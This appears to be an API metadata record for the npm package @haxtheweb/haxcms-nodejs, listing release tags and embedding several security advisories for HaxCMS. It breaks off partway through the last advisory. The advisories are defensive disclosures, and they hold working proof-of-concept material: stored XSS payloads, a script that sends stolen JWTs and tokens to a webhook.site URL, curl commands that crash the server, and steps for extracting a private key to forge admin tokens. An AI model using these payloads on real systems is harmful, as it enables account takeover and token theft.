ejs/tags/v0.0.9/manifests"},{"name":"v0.0.8","sha":"1ad937fff83d585ba3ddc8e84b5416357a419ec7","kind":"tag","published_at":"2024-06-18T19:50:54.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.8","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.8/manifests"},{"name":"v0.0.7","sha":"d73bc0415579c0ffdf2ee18623d599de44a18dae","kind":"tag","published_at":"2024-06-18T19:31:06.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.7","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.7/manifests"},{"name":"v0.0.6","sha":"9c0d5ad7b4447f49e76f6be99faf14d0aac57955","kind":"tag","published_at":"2024-06-18T19:14:03.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.6","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.6/manifests"},{"name":"v0.0.5","sha":"9ebd48726809ce60b02f2acbbb97e1ba70811fce","kind":"tag","published_at":"2024-06-18T19:06:31.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.5","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.5/manifests"},{"name":"v0.0.4","sha":"b2135ce1eea6c6879f7efd1adb0c2211a52e2a40","kind":"tag","published_at":"2024-06-18T19:02:06.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.4","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.4/manifests"},{"name":"v0.0.3","sha":"289c75758ba2036c63f45b30ea448e56edeabd7f","kind":"tag","published_at":"2024-06-17T20:54:35.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.3","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"34d542e05bd635dc03dc6fcbdef63da3aa396a4a","kind":"tag","published_at":"2024-06-17T20:47:48.000Z","download_url":"https://codeload.github.com/haxtheweb/haxcms-nodejs/tar.gz/v0.0.2","html_url":"https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/haxtheweb/haxcms-nodejs@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/tags/v0.0.2/manifests"}]},"repo_metadata_updated_at":"2026-10-02T10:08:07.705Z","dependent_packages_count":0,"downloads":1469,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":27.985146168831427,"dependent_packages_count":40.66990260499434,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":34.327524386912884},"purl":"pkg:npm/%40haxtheweb/haxcms-nodejs","advisories":[{"uuid":"GSA_kwCzR0hTQS1nMmc4LTk1cWctdjM1aM4ABXuO","url":"https://github.com/advisories/GHSA-g2g8-95qg-v35h","title":"HaxCMS has a stored Cross-Site Scripting (XSS) bypass in its saveNode endpoint","description":"## Summary\n\nHaxCMS is affected by a stored cross-site scripting (XSS) vulnerability in the `/system/api/saveNode` endpoint. An authenticated user with a permission to edit pages can bypass the HTML sanitizer by injecting an event handler attribute without whitespace before the attribute name.\n\nFor example, the sanitizer misses:\n\n```html\n\u003ca href=\"#\"onclick=\"alert('kn1ph')\"\u003eclick me\u003c/a\u003e\n```\n\nThe important bypass is:\n\n```html\nhref=\"#\"onclick=\n```\n\nThe payload is stored in the generated page files and executes when a user clicks the injected link.\n\n## Details\n\nThe issue is caused by regex-based HTML sanitization that expects whitespace before event handler attributes. Because the sanitizer expects a pattern like:\n\n```html\nhref=\"#\" onclick=\"...\"\n```\n\nIt fails to remove an event handler when it is written without whitespace:\n\n```html\nhref=\"#\"onclick=\"...\"\n```\n\nBrowsers still parse `onclick` as a valid event handler attribute, so the JavaScript executes when the element is clicked.\n\nAffected endpoint:\n\n```text\nPOST /system/api/saveNode?site_token=[VALID_SITE_TOKEN]\n```\n\nAffected parameter:\n\n```text\nnode.body\n```\n\n## PoC\n\n1. Log in to HaxCMS and edit any existing page.\n\n2. Capture the page save request in Burp Suite:\n\n```text\nPOST /system/api/saveNode?site_token=[VALID_SITE_TOKEN]\n```\n3. In the JSON request body, modify only the `node.body` value.\n\nChange:\n```json\n\"body\":\"...existing page content...\\n\"\n```\nTo:\n```json\n\"body\":\"...existing page content...\\n\u003ca href=\\\"#\\\"onclick=\\\"alert('kn1ph')\\\"\u003eclick me\u003c/a\u003e\\n\"\n```\n\n5. Forward the request.\n\n6. Open the edited page and click `click me`.\n\nResult:\n\nThe JavaScript will execute and the alert will pop up. \n\nIt was confirmed that the payload is stored in the generated page files, including `index.html`.\n\n## Impact\n\nAn authenticated user with permissions to edit the page can inject stored JavaScript into the page content. If a privileged user interacts with the injected element while authenticated, the attacker controlled JavaScript will execute in that user’s browser.\n\nBased on local testing, the XSS can access browser-exposed HaxCMS data such as `localStorage.jwt` and `window.appSettings`, including API paths and tokens available to the authenticated user.\n\nThis may allow an attacker to perform actions as the victim within the limits of the exposed tokens and the victim’s permissions and possibly chain more vulnerabilities.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-29T14:07:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-g2g8-95qg-v35h","https://nvd.nist.gov/vuln/detail/CVE-2026-48527","https://github.com/advisories/GHSA-g2g8-95qg-v35h"],"source_kind":"github","identifiers":["GHSA-g2g8-95qg-v35h","CVE-2026-48527"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-29T15:00:08.906Z","updated_at":"2026-09-25T12:03:21.745Z","epss_percentage":0.00374,"epss_percentile":0.28587,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nMmc4LTk1cWctdjM1aM4ABXuO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nMmc4LTk1cWctdjM1aM4ABXuO","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.1","vulnerable_version_range":"\u003c= 26.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nMmc4LTk1cWctdjM1aM4ABXuO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05cjMzLXhodzgtNHFxcM4ABXHm","url":"https://github.com/advisories/GHSA-9r33-xhw8-4qqp","title":"HAX CMS: Denial of Service using Malicious Import Request","description":"### Summary\n\nThe HAX CMS NodeJS application crashes when an authenticated attacker sends a specially crafted site creation request to the createSite endpoint. A single request is sufficient to take the entire application offline, requiring a manual server restart to restore service.\n\n### Details\n\nThe `createSite` remote import flow does **not** complete end-to-end. Instead, the server crashes before the outbound HTTP fetch happens.\n\nThe crash occurs because `createSite` passes a file object without `originalname`, while `HAXCMSFile.save()` immediately dereferences `tmpFile.originalname.replace(...)`.\n\nAs a result:\n\n- the request reaches privileged code inside `createSite`\n- the server hits the remote file handling path\n- the process crashes before `downloadAndSaveFile()` performs the outbound request\n- no imported file is written into the site directory\n\n### Affected Resources\n\n- src/routes/createSite.js:176\n- src/lib/HAXCMSFile.js:25\n- system/api/createSite\n\n### PoC\n\n1. Obtain a JWT by logging in with valid credentials.\n\n```bash\nJWT=$(curl -s -X POST 'http://127.0.0.1:3000/system/api/login' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"username\":\"admin\",\"password\":\"admin\"}' | grep -o '\"jwt\":\"[^\"]*\"' | head -1 | cut -d'\"' -f4)\n```\n\n2. Extract the required tokens from the `connectionSettings` endpoint.\n\n```bash\nSETTINGS=$(curl -s 'http://127.0.0.1:3000/system/api/connectionSettings')\nROOT_TOKEN=$(printf '%s' \"$SETTINGS\" | grep -o '\"token\":\"[^\"]*\"' | head -1 | cut -d'\"' -f4)\nUSER_TOKEN=$(printf '%s' \"$SETTINGS\" | grep -o 'createSite[^\"]*' | grep -o 'user_token=[^\"\u0026]*' | cut -d'=' -f2)\n```\n\n3. Send the malformed request to crash the server.\n\n```bash\ncurl -i -X POST \"http://127.0.0.1:3000/system/api/createSite?user_token=$USER_TOKEN\u0026jwt=$JWT\" \\\n  -H 'Content-Type: application/json' \\\n  -d \"{\n    \\\"token\\\": \\\"$ROOT_TOKEN\\\",\n    \\\"site\\\": { \\\"name\\\": \\\"dos-poc\\\" },\n    \\\"theme\\\": {},\n    \\\"build\\\": {\n      \\\"structure\\\": \\\"import\\\",\n      \\\"type\\\": \\\"import\\\",\n      \\\"items\\\": [],\n      \\\"files\\\": {\n        \\\"files/poc.txt\\\": \\\"http://127.0.0.1:8888/poc.txt\\\"\n      }\n    }\n  }\"\n```\n\n\u003cimg width=\"953\" height=\"433\" alt=\"Empty-Reply\" src=\"https://github.com/user-attachments/assets/f3562726-2e64-4af6-a06c-8356dc7708da\" /\u003e\n\n\nThe curl client receives an empty reply as the server crashes mid-request. The Node.js process terminates immediately with TypeError: Cannot read properties of undefined (reading 'replace') and nodemon reports the application as crashed.\n\n\u003cimg width=\"950\" height=\"278\" alt=\"crash-detail\" src=\"https://github.com/user-attachments/assets/1fbc80fb-4c2d-4bc6-af29-c3e9c45e8ad1\" /\u003e\n\n\n### Impact\n\nAn authenticated attacker can crash the HAX CMS NodeJS process with a single HTTP request, making the application unavailable to all users until the server is manually restarted. Since HAX CMS allows account registration, an attacker does not need to compromise existing credentials; they can create their own account and immediately use it to trigger the crash.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-19T19:51:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-9r33-xhw8-4qqp","https://nvd.nist.gov/vuln/detail/CVE-2026-46357","https://github.com/advisories/GHSA-9r33-xhw8-4qqp"],"source_kind":"github","identifiers":["GHSA-9r33-xhw8-4qqp","CVE-2026-46357"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-19T20:00:18.811Z","updated_at":"2026-09-25T12:03:32.712Z","epss_percentage":0.00411,"epss_percentile":0.32543,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cjMzLXhodzgtNHFxcM4ABXHm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05cjMzLXhodzgtNHFxcM4ABXHm","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c 26.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cjMzLXhodzgtNHFxcM4ABXHm/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14M3g1LTdoNGgtZ3d4Z84ABXFj","url":"https://github.com/advisories/GHSA-x3x5-7h4h-gwxg","title":"HAXcms: Mass Token Exfiltration and Cross-Tenant Hijack ","description":"### Summary\nAn attack chain utilizing **Stored XSS** alongside dynamic token exposure in the `/system/api/connectionSettings` endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the `jwt`, `user_token`, `site_token`, and `appstore_token`) into a global JavaScript variable (`window.appSettings`). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook.\n\n### Details\nIn `Operations.php` (`connectionSettings()`), the system returns a Javascript object designed to bootstrap the frontend context. This object, `window.appSettings`, acts as a \"skeleton key\" because it aggregates all necessary operational tokens for the active session. \n\nWhile HAXcms correctly relies on the cryptographically signed JWT for backend authentication (preventing Direct Object Reference/IDOR attempts), the CMS fails to secure the tokens themselves. Specifically:\n1. **The Vector**: The system is vulnerable to Stored XSS (e.g., via injected `iframe` `srcdoc` or `\u003cvideo-player\u003e`).\n2. **The Exposure**: Because the `connectionSettings` endpoint serves the tokens locally based on the active `PHPSESSID` cookie, any malicious script running in the browser context can intercept these keys.\n3. **The Chain**: HAXcms isolates user environments by URL path (`/\u003cusername\u003e/`). An attacker can use XSS to force the victim's browser to fetch their *target* username's specific settings via `fetch('/\u003cusername\u003e/system/api/connectionSettings')`. Since the browser implicitly attaches the victim's session cookie, the server authenticates the request and returns the victim's valid JWT and tokens.\n\n### PoC\n**1. Setup the Webhook Target**\nPrepare an external webhook (e.g., `webhook.site`) to receive the stolen data.\n\n**2. Inject the \"Kill Chain\" Payload**\nAs an authenticated attacker (e.g., having edit access to any site), inject the following Javascript via the verified Stored XSS vectors (such as checking the HTML Source of a page and writing an `\u003ciframe\u003e`):\n\n```html\n\u003ciframe srcdoc=\"\u003cscript\u003e\n    const targetUsername = 'bto108'; // Replace with target victim\n\n    fetch(`/${targetUsername}/system/api/connectionSettings`)\n      .then(res =\u003e res.text())\n      .then(data =\u003e {\n          const s = JSON.parse(data.substring(data.indexOf('{'), data.lastIndexOf('}') + 1));\n          \n          const uToken = new URL(document.location.origin + s.getUserDataPath).searchParams.get('user_token');\n          const sToken = new URL(document.location.origin + s.saveNodePath).searchParams.get('site_token');\n          \n          let aToken = 'N/A';\n          if (s.appStore \u0026\u0026 s.appStore.params \u0026\u0026 s.appStore.params.appstore_token) {\n              aToken = s.appStore.params.appstore_token;\n          }\n\n          // Exfiltrate via Image Request to bypass CORS\n          const payload = btoa(JSON.stringify({\n              target: targetUsername, \n              jwt: s.jwt, \n              user_token: uToken, \n              site_token: sToken, \n              appstore_token: aToken\n          }));\n          \n          new Image().src = `https://webhook.site/YOUR-WEBHOOK-ID?data=${payload}`;\n      });\n\u003c/script\u003e\" style=\"display:none\"\u003e\u003c/iframe\u003e\n```\n\n**3. Execution \u0026 Verification**\n- When the victim (e.g., user `bto108`) views the compromised page, their browser automatically fires the `fetch` request, silently attaching their active session cookie.\n- The server responds with their connection settings.\n- The script parses their `jwt`, `user_token`, and other keys, encoding them in base64.\n- The attacker receives the full JWT and token dump on their webhook.\n\n*Screenshots confirming the data leakage and webhook capture:*\n![Connection Settings Exposure](https://github.com/user-attachments/assets/1aeee4ee-9475-4430-b4d3-3c6254075d11)\n![Secondary Settings Leak](https://github.com/user-attachments/assets/7179c1a5-2bfb-4ab6-ba1d-29bcb61a74d3)\n![Cross-tenant Exfiltration Console](https://github.com/user-attachments/assets/1abd21ec-fd45-4bd8-ba67-9c0bb19e6b08)\n![Webhook Payload Capture](https://github.com/user-attachments/assets/751e5cab-f4ad-4ab4-b276-86bf738f0434)\n![Stolen Data Result](https://github.com/user-attachments/assets/a41e15f7-1652-4351-8cc9-a423f6220158)\n\n\n### Impact\n**Critical Severity.** \nThis attack completely compromises the primary defense mechanism of the CMS. By stealing the `jwt` and `user_token`, the attacker achieves **total account hijacking** without needing the victim's password. They can emulate the victim perfectly, bypassing standard interface restrictions to perform malicious administrative actions (creating/deleting sites, modifying user access, or uploading malicious content).\n\nThe reliance on a global Javascript variable (`window.appSettings`) to store long-lived administrative security tokens creates a devastating chokepoint when combined with XSS.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-19T14:47:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-x3x5-7h4h-gwxg","https://nvd.nist.gov/vuln/detail/CVE-2026-46511","https://github.com/advisories/GHSA-x3x5-7h4h-gwxg"],"source_kind":"github","identifiers":["GHSA-x3x5-7h4h-gwxg","CVE-2026-46511"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-19T15:00:17.494Z","updated_at":"2026-09-25T12:03:32.735Z","epss_percentage":0.00481,"epss_percentile":0.38849,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M3g1LTdoNGgtZ3d4Z84ABXFj","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14M3g1LTdoNGgtZ3d4Z84ABXFj","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M3g1LTdoNGgtZ3d4Z84ABXFj/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qaDNoLXJweGctZnIzNs4ABXFi","url":"https://github.com/advisories/GHSA-jh3h-rpxg-fr36","title":"Stored XSS via \u003ciframe\u003e in HAX CMS allows access to sensitive client-side data and account takeover","description":"### Summary\nA stored cross-site scripting (XSS) vulnerability exists in HAX CMS due to improper sanitization of `\u003ciframe\u003e` elements.\n\nThe application allows `javascript:` URIs in the `src` attribute, which are executed when a malicious page is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim’s browser and access sensitive data exposed to client-side scripts.\n\n### Details\nSuccessful exploitation allows access to any data available in the browser context, including:\n\n- Authentication tokens (e.g., JWT)\n- Session cookies (if not protected with HttpOnly)\n- Application configuration (e.g., window.appSettings)\n- User-specific data accessible via APIs\n\nThis significantly increases the impact beyond simple script execution.\n\n### PoC\nSteps to reproduce:\n\n1. Log in to HAX CMS as any authenticated user.\n2. Create a new page or edit an existing page.\n3. Open the HTML source editor (`\u003c\u003e`).\n4. Insert the following payload:\n\n```html\n\u003ciframe srcdoc=\"\u0026lt;script\u0026gt;\n    (function(){\n        try {\n            var jwt = parent.window.appSettings.jwt;\n            alert('Stolen JWT:\\n' + jwt);\n        } catch(e) {\n            alert('Error: ' + e.message);\n        }\n    })();\n\u0026lt;/script\u0026gt;\" style=\"display:none\" sandbox=\"allow-scripts allow-same-origin\"\u003e\u003c/iframe\u003e\n```\n\u003cimg width=\"2446\" height=\"1319\" alt=\"image\" src=\"https://github.com/user-attachments/assets/daea3b41-8c72-4f6c-ab32-34c688bbd251\" /\u003e\n\n\n\u003cimg width=\"2464\" height=\"1397\" alt=\"image\" src=\"https://github.com/user-attachments/assets/911cbd42-db50-454a-b178-51555e0db79c\" /\u003e\n\n\n\n\u003cimg width=\"2466\" height=\"1409\" alt=\"webhook`\" src=\"https://github.com/user-attachments/assets/8a286435-98f4-418c-a596-d0c19556696a\" /\u003e\n\n### Impact\nThis vulnerability allows stored XSS leading to:\n\n- Execution of arbitrary JavaScript in victim browsers\n- Access to sensitive client-side data, including authentication tokens and session identifiers\n- Unauthorized API actions performed on behalf of the victim\n- Session hijacking and full account takeover\n\nBecause the application exposes authentication data in the client-side environment, exploitation of this vulnerability can lead to complete compromise of user accounts and site content.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-19T14:46:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-jh3h-rpxg-fr36","https://nvd.nist.gov/vuln/detail/CVE-2026-46396","https://github.com/advisories/GHSA-jh3h-rpxg-fr36"],"source_kind":"github","identifiers":["GHSA-jh3h-rpxg-fr36","CVE-2026-46396"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-19T15:00:17.494Z","updated_at":"2026-10-02T13:02:56.586Z","epss_percentage":0.0039,"epss_percentile":0.3059,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDNoLXJweGctZnIzNs4ABXFi","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qaDNoLXJweGctZnIzNs4ABXFi","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/iframe-loader","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fiframe-loader"},{"ecosystem":"npm","package_name":"@haxtheweb/video-player","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fvideo-player"},{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qaDNoLXJweGctZnIzNs4ABXFi/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02YzhnLTloZmgtcHE1aM4ABXFh","url":"https://github.com/advisories/GHSA-6c8g-9hfh-pq5h","title":"HAXcms: Private Key Disclosure via Broken HMAC Implementation","description":"### Summary\nThe `hmacBase64()` function in the HAXcms Node.js backend contains two critical cryptographic implementation errors that together allow any unauthenticated attacker to extract the system’s private signing key and forge arbitrary admin-level JSON Web Tokens (JWTs) allowing them to get full admin access with a single HTTP request.\n\n### Details\nBug 1: Hardcoded HMAC Key (line 2160): The function passes the literal string \"0\" as the HMAC signing key instead of the key parameter, making every HAXcms instance compute identical HMACs for the same input.\n\nBug 2: Private Key Appended to Output (lines 2161- 2163): After computing the HMAC, the function concatenates the real key parameter which is \"this.privateKey + this.salt\", the system’s master signing secret is directly onto the output. The combined buffer is base64-encoded and returned as the token.\n\nEvery base64url token produced has the same structure: 32 bytes HMAC keyed with \"0\" and N bytes of `privateKey+salt`. An attacker base64-decodes any token, discards the first 32 bytes, and reads the private key directly.\n\nThe `/system/api/connectionSettings` endpoint is unauthenticated and returns multiple tokens generated by this function. A single GET request to this endpoint exposes the private key.\n\nThe PHP backend (HAXCMS.php:1619-1631) implements this function correctly with the actual key and returns only the hash. The PHP version produces 44-character tokens whereas the broken Node.js version produces 139+ character tokens.\n\n### PoC\n1. GET request to `/system/api/connectionSettings` endpoint and fetch the token.\n2. Extract the private key from the fetched token. The `hmacBase64()` function produces 32 bytes with HMAC-SHA256 with hardcoded key \"0\" and the rest of the bytes are `privateKey+salt` (plaintext). Decode the Base64 token, discard the first 32 bytes, read the remaining bytes as UTF-8 (this is your extracted private key).\n3. Since JWT's are signed with `privateKey+salt`, use this stolen private key to forge a JWT for admin using `JWT.sign(payload, this.privateKey+this.salt)`. NOTE: the payload uses {id, user (set this as admin), iat (current timestamp), exp (expiration timestamp)}\n4. The same key can also be used to create other tokens (user_token, base_token, form_token, etc).\n5. Use these forged tokens to hit all authenticated endpoints (modify/delete/create etc) with admin privileges.\n\n### Impact\nAn unauthenticated attacker can perform the complete attack chain with a single HTTP request:\n1. Extract private key: GET \"/system/api/connectionSettings\", base64-decode any token, discard first 32 bytes.\n2. Forge admin JWT: sign arbitrary JWT payloads with the stolen privateKey+salt.\n3. Forge all request tokens: compute valid user_token, site_token for any API call.\n4. Full admin access: create/modify/delete sites, upload files, modify content.\n\nThis works even if the admin has changed the default credentials to a strong password. The forged tokens produce no login events in logs.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-05-19T14:44:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-6c8g-9hfh-pq5h","https://nvd.nist.gov/vuln/detail/CVE-2026-46395","https://github.com/advisories/GHSA-6c8g-9hfh-pq5h"],"source_kind":"github","identifiers":["GHSA-6c8g-9hfh-pq5h","CVE-2026-46395"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-19T15:00:17.494Z","updated_at":"2026-09-25T12:03:32.736Z","epss_percentage":0.00287,"epss_percentile":0.18817,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02YzhnLTloZmgtcHE1aM4ABXFh","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02YzhnLTloZmgtcHE1aM4ABXFh","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"26.0.0","vulnerable_version_range":"\u003c= 25.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02YzhnLTloZmgtcHE1aM4ABXFh/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0ybTZwLWhtM3ctNmptM84ABXFf","url":"https://github.com/advisories/GHSA-2m6p-hm3w-6jm3","title":"HAX CMS: Stored XSS via '\u003cvideo-player\u003e' component allows arbitrary JavaScript execution and token theft","description":"### Summary\nA stored cross-site scripting (XSS) vulnerability exists in HAX CMS due to improper sanitization of the `\u003cvideo-player\u003e` component.\n\nThe component allows `javascript:` URIs in the `source` attribute, which are executed when the page is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim’s browser and access sensitive data such as JWT tokens and more.\n\n### Details\nThe vulnerability is present in the `\u003cvideo-player\u003e` web component used within the HAX CMS editor.\n\nThe application fails to validate or sanitize user-supplied input in the following attributes:\n- `source`\n- `source-data`\n\nThese attributes accept arbitrary URI schemes, including `javascript:`, which leads to execution of attacker-controlled JavaScript in the browser.\n\nExample vulnerable usage:\n```html\n\u003cvideo-player \n  source=\"javascript:alert(document.domain)\" \n  source-type=\"external\"\u003e\n\u003c/video-player\u003e\n```\n\n\nBecause this content is stored and rendered to other users, the vulnerability is classified as a stored XSS.\n\nThe root cause is the lack of URI scheme validation and improper sanitization of component attributes before rendering.\nBecause this content is stored and rendered to other users, the vulnerability is classified as a stored XSS.\n\nThe root cause is the lack of URI scheme validation and improper sanitization of component attributes before rendering.\n\n\n### PoC\n\nSteps to reproduce:\n1. Log in to HAX CMS as user.\n2. Create a website or any page and switch to the HTML source editor (`\u003c\u003e`).\n3. Insert the following payload:\n\n```html\n\u003cvideo-player source=\"javascript:alert('JWT: '+localStorage.getItem('jwt').substring(0,30))\" source-type=\"external\"\u003e\u003c/video-player\u003e\n```\n\u003cimg width=\"2456\" height=\"1405\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ea037043-7ff7-4840-bed0-1091692c6289\" /\u003e\n\n\nSave the page.\n\nReload or revisit or send the page.\n\nResult\n\u003cimg width=\"2468\" height=\"1394\" alt=\"image\" src=\"https://github.com/user-attachments/assets/543bbf69-900d-4e2d-bd6b-0658fb5aa899\" /\u003e\n\n\nA JavaScript alert executes.\nThe JWT token is exposed.\nThis confirms arbitrary JavaScript execution in the victim’s browser.\n\n\n### Impact\n\nThis vulnerability allows stored 